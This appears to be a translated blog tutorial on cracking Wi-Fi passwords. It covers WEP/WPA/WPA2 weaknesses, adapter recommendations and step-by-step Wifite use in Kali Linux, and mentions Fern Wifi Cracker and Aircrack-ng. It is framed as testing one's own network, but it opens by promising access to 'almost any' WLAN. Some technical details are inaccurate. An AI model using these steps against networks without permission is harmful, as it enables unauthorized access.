With this guide, the tools shown and the recommended hardware, you can find out almost any WLAN password.
In Hollywood movies it looks easy and little time consuming ? the cracking of foreign WiFi networks. A fast typing person sits at a laptop and various network names appear on the dark screen in green lettering along with the corresponding passwords. But what does reality look like?
Behind the abbreviation WLAN (in English also often simply Wi-Fi) the words ?Wireless Local Area Network? hide themselves and stand, as the name perhaps already suggests, for a wireless local radio network. It is used wherever data transmission via cable would not be possible or would require a great deal of effort ? or just for convenience within your own four walls.
It is precisely for these two reasons that WLANs are indispensable today. It can happen that when searching for a home WLAN network, a long list of foreign networks appears, which often and especially in conurbations can have identical names.
Although identical WiFi names are not a problem for a computer, since it does not distinguish network devices by the aforementioned names, but by so-called MAC addresses (Media Access Control Address), but we humans find it somewhat more difficult.
But what is a MAC address again?
A MAC address is the hardware address of a network card (e.g. WLAN stick, WLAN chip integrated in the notebook or also for LAN) and serves as a unique identifier of a network-compatible device. Here the use of the MAC address is not only limited to the Wireless LAN technology, but is also used for data transmission via cable (LAN).
SSID / ESSID
So that we, as normal users, can distinguish between these many WLANs, it is possible to change the default name of your WLAN router or network as you wish. This name is called SSID (Service Set Identifier) in expert circles and will be read more frequently in the following ? so remember it well.
Now you know the basic terminology for our topic. Let us now take a small step deeper into the subject. Let us now move on to the subject of security.
Most WiFi networks are not freely accessible and have been secured using a specified network key. There are three different types of encryption methods, each of which is difficult to crack.
The following table shows the three common security standards with their associated encryption algorithms:
WEPAlgorithm: RC4Secure? nope
WPAAlgorithm: TKIPSecure? kind of, but no
WPA2Algorithm: AESSecure? yes
This is the most insecure of the three security standards and uses the easily cracked RC4 encryption algorithm. Networks using this algorithm can be hacked with little effort and in a short time. One of the reasons for this is that static keys are used for encryption, which in addition only have a comparatively short length of 40?128 bits. In addition, key pairs can easily be collected and then used for so-called known-plaintext attacks. More about this later.
WPA & WPA2
WPA or WPA2 is the successor of the aforementioned WEP and uses instead of the RC4 algorithm, the Advanced Encryption Standard with a key length of 256 bits that is considered ?unbreakable?. The word ?unbreakable? really only refers to the algorithm itself and not to the password defined by the user.
If the chosen password is too short or too simple, it can be guessed easily and automatically by means of a so-called brute force attack by a computer. In this attack, the computer independently tries out all possible combinations of letters, numbers and special characters. Finished word lists can also be used in a brute force attack. Of course, this trial and error takes its time and gives the right impression: The more complicated and longer the password, the longer the attack will take. If the password exceeds a certain length and complexity, the attack even becomes something insoluble. In practice, however, a password that is too heavy is the exception, as many Internet users prefer the convenience of a short password that is easy to remember ? unfortunately.
From the attacker?s point of view, the better the hardware used to hack and the weaker the obstacles, the more efficient and faster the attack.
WLAN hacking or WLAN pentesting
Before you have learned why it is so important to protect your own network from unauthorized access. But is your network really as secure as the manufacturer of your router promises? Is your chosen password really sufficient? The best way to find out is to test it!
The success of a hacking attack on WiFi networks is largely determined by the hardware used, the targeted target and the distance to the target system or the received signal strength of the WLAN. These factors are among the most important, since most hacking methods depend on the traffic of the target system and logins from other users (clients).
At this point, many problems can occur and cause a lot of frustration.
In order to avoid this frustration when hacking your WLAN, you should consider these factors from the beginning and choose one of the attacks introduced later.
What hardware should you use?
An underestimated point is the right hardware ? more precisely the WLAN adapter.
In the normal state, each WLAN adapter only passes through the data packets addressed to it. This is completely legitimate for normal operation. However, this is by far not sufficient for WLAN hacking because we have to pick up all other data packets that are sent between the target system and other users for various attacks.
For this purpose, the WLAN adapter must be able to handle the so-called monitor mode and injections. In addition, it should have a relatively high transmission speed and bandwidth in order to handle hacking attacks quickly and efficiently.
In order to save you the long search for suitable WLAN adapters, I have put together some models for you in the following. This is not a paid product placement, it is an honest recommendation on my part.
- ALFA Network AWUS036NHA
- TP-Link Archer T2UH AC600
- ALFA Network AWUS036AC
What software can you use?
With Wifite you can almost automatically crack WEP, WPA and WPA2 secured WiFi networks. The operation is relatively simple and especially suitable for beginners. Another positive feature of this tool is that it detects WPS security gaps and cracks them relatively quickly.
To start an attack with this tool in Kali Linux you first have to open the terminal. Then type the command: wifite
At this point you can also enter wifite -wep if you only want to search for networks with a WEP encryption standard.
After executing one of the two commands, the tool starts to search and list all WLANs within your range. As soon as the desired test network appears in the list, you can end the search by pressing Ctrl + C.
Now Wifite asks you which of the listed networks should be hacked.Here you simply enter one or more numbers for the respective network(s). It is also possible to select all networks from the list with ?all?, but you should only do this if they are all your test networks.
Pressing the Enter key again starts the fully automatic cracking of the network keys, which will be displayed in plain text if successful.With a little luck, this process can be completed within a few minutes, but can also last for many hours ? which is usually the case. This depends on how complex the password is and how good the hardware you have is.
Fern Wifi Cracker
The Fern Wifi Cracker is also a tool that can crack all three encryption methods (WEP, WPA, WPA2). Additionally Man-in-the-Middle attacks and Brutefoce attacks are possible with this tool. Due to the clear interface of the program the use is relatively easy.
With Aircrack-ng you can analyze and exploit chess points in your WLAN and even record and evaluate data packets. It is also possible to decrypt WEP, WPA and WPA2. Aircrack-ng is however something for experienced users due to its wide range of possibilities.
Even with this basic knowledge and the Wifite tool shown above, you will succeed in attacking your test network for the first time. In order to be able to crack even harder nuts, however, it is definitely worth taking a look at the Aircrack-ng tool. Admittedly, this tool is a bit more complex than Wifite, but it convinces with its wide range of functions and the multitude of attack possibilities.